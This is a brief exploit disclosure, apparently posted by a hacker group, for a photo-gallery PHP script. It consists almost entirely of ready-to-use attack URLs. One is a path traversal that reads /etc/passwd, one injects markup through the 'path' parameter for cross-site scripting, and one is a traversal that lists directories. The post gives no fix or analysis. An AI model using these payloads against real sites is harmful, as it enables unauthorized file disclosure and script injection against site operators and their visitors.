vendor: http://www.jakeo.com vuln : http://[host]/foto/index.php?path=../../etc/passwd http://[host]/foto/index.php?path=<b>xss</b> http://[host]/foto/index.php?path=../../[directory listing] Author : Vampire Vampire_chiristof@xxxxxxxxx Homepage : Www.HackerZ.iR Www.H4ckerZ.Com Iran HackerZ Security Team